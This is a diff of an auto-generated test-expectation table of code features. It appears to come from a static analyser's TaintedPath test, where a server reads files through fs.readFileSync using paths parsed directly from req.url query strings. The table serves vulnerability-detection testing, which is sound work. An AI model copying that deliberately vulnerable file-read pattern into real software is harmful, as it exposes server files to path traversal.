autogenerated/TaintedPath/TaintedPath.js:77:15:77:77 | exceptional return of fs.read ... .query) | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:77:15:77:77 | exceptional return of fs.read ... .query) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:77:15:77:77 | exceptional return of fs.read ... .query) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:77:15:77:77 | fs.read ... .query) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:77:15:77:77 | fs.read ... .query) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:77:15:77:77 | fs.read ... .query) | contextFunctionInterfaces | views_local(req, res) | @@ -5315,6 +60682,41 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:77:15:77:77 | fs.read ... .query) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:77:15:77:77 | fs.read ... .query) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:77:15:77:77 | fs.read ... .query) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:77:18:77:29 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:18:77:29 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:18:77:29 | readFileSync | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:77:18:77:29 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:77:18:77:29 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:37 | require | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:37 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:37 | require | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:37 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:37 | require | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:55 | exceptional return of require ... ngify") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:55 | exceptional return of require ... ngify") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:55 | exceptional return of require ... ngify") | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:55 | exceptional return of require ... ngify") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:55 | exceptional return of require ... ngify") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:55 | require ... ngify") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:55 | require ... ngify") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:55 | require ... ngify") | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:55 | require ... ngify") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:55 | require ... ngify") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:61 | require ... ).parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:61 | require ... ).parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:61 | require ... ).parse | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:61 | require ... ).parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:61 | require ... ).parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:70 | exceptional return of require ... eq.url) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:70 | exceptional return of require ... eq.url) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:70 | exceptional return of require ... eq.url) | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:70 | exceptional return of require ... eq.url) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:70 | exceptional return of require ... eq.url) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:70 | require ... eq.url) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:70 | require ... eq.url) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:70 | require ... eq.url) | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:70 | require ... eq.url) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:77:31:77:70 | require ... eq.url) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:77:31:77:76 | require ... ).query | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:77:31:77:76 | require ... ).query | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:77:31:77:76 | require ... ).query | calleeImports | fs | @@ -5332,6 +60734,16 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:77:39:77:54 | "querystringify" | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | | autogenerated/TaintedPath/TaintedPath.js:77:39:77:54 | "querystringify" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:77:39:77:54 | "querystringify" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:77:57:77:61 | parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:57:77:61 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:57:77:61 | parse | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:77:57:77:61 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:77:57:77:61 | parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:77:63:77:65 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:63:77:65 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:63:77:65 | req | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:77:63:77:65 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:77:63:77:65 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:77:63:77:69 | req.url | CalleeFlexibleAccessPath | import(!).parse | | autogenerated/TaintedPath/TaintedPath.js:77:63:77:69 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:77:63:77:69 | req.url | calleeImports | querystringify | @@ -5340,6 +60752,56 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:77:63:77:69 | req.url | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | | autogenerated/TaintedPath/TaintedPath.js:77:63:77:69 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:77:63:77:69 | req.url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:77:67:77:69 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:67:77:69 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:67:77:69 | url | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:77:67:77:69 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:77:67:77:69 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:77:72:77:76 | query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:72:77:76 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:72:77:76 | query | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:77:72:77:76 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:77:72:77:76 | query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:7 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:7 | res | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:7 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:7 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:13 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:13 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:13 | res.write | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:13 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:13 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:76 | exceptional return of res.wri ... query)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:76 | exceptional return of res.wri ... query)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:76 | exceptional return of res.wri ... query)) | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:76 | exceptional return of res.wri ... query)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:76 | exceptional return of res.wri ... query)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:76 | res.wri ... query)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:76 | res.wri ... query)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:76 | res.wri ... query)) | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:76 | res.wri ... query)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:78:5:78:76 | res.wri ... query)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:78:9:78:13 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:9:78:13 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:9:78:13 | write | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:78:9:78:13 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:78:9:78:13 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:78:15:78:16 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:15:78:16 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:15:78:16 | fs | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:78:15:78:16 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:78:15:78:16 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:78:15:78:29 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:15:78:29 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:15:78:29 | fs.readFileSync | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:78:15:78:29 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:78:15:78:29 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:78:15:78:75 | exceptional return of fs.read ... .query) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:15:78:75 | exceptional return of fs.read ... .query) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:78:15:78:75 | exceptional return of fs.read ... .query) | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:78:15:78:75 | exceptional return of fs.read ... .query) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:78:15:78:75 | exceptional return of fs.read ... .query) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:78:15:78:75 | fs.read ... .query) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:78:15:78:75 | fs.read ... .query) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:78:15:78:75 | fs.read ... .query) | contextFunctionInterfaces | views_local(req, res) | @@ -5348,6 +60810,41 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:78:15:78:75 | fs.read ... .query) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:78:15:78:75 | fs.read ... .query) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:78:15:78:75 | fs.read ... .query) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:78:18:78:29 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:18:78:29 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:18:78:29 | readFileSync | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:78:18:78:29 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:78:18:78:29 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:37 | require | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:37 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:37 | require | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:37 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:37 | require | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:53 | exceptional return of require ... tring") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:53 | exceptional return of require ... tring") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:53 | exceptional return of require ... tring") | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:53 | exceptional return of require ... tring") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:53 | exceptional return of require ... tring") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:53 | require ... tring") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:53 | require ... tring") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:53 | require ... tring") | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:53 | require ... tring") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:53 | require ... tring") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:59 | require ... ).parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:59 | require ... ).parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:59 | require ... ).parse | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:59 | require ... ).parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:59 | require ... ).parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:68 | exceptional return of require ... eq.url) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:68 | exceptional return of require ... eq.url) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:68 | exceptional return of require ... eq.url) | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:68 | exceptional return of require ... eq.url) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:68 | exceptional return of require ... eq.url) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:68 | require ... eq.url) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:68 | require ... eq.url) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:68 | require ... eq.url) | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:68 | require ... eq.url) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:78:31:78:68 | require ... eq.url) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:78:31:78:74 | require ... ).query | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:78:31:78:74 | require ... ).query | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:78:31:78:74 | require ... ).query | calleeImports | fs | @@ -5365,6 +60862,16 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:78:39:78:52 | "query-string" | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | | autogenerated/TaintedPath/TaintedPath.js:78:39:78:52 | "query-string" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:78:39:78:52 | "query-string" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:78:55:78:59 | parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:55:78:59 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:55:78:59 | parse | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:78:55:78:59 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:78:55:78:59 | parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:78:61:78:63 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:61:78:63 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:61:78:63 | req | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:78:61:78:63 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:78:61:78:63 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:78:61:78:67 | req.url | CalleeFlexibleAccessPath | import(!).parse | | autogenerated/TaintedPath/TaintedPath.js:78:61:78:67 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:78:61:78:67 | req.url | calleeImports | query-string | @@ -5373,6 +60880,56 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:78:61:78:67 | req.url | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | | autogenerated/TaintedPath/TaintedPath.js:78:61:78:67 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:78:61:78:67 | req.url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:78:65:78:67 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:65:78:67 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:65:78:67 | url | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:78:65:78:67 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:78:65:78:67 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:78:70:78:74 | query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:70:78:74 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:78:70:78:74 | query | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:78:70:78:74 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:78:70:78:74 | query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:7 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:7 | res | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:7 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:7 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:13 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:13 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:13 | res.write | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:13 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:13 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:75 | exceptional return of res.wri ... query)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:79:5:79:75 | exceptional return of res.wri ... 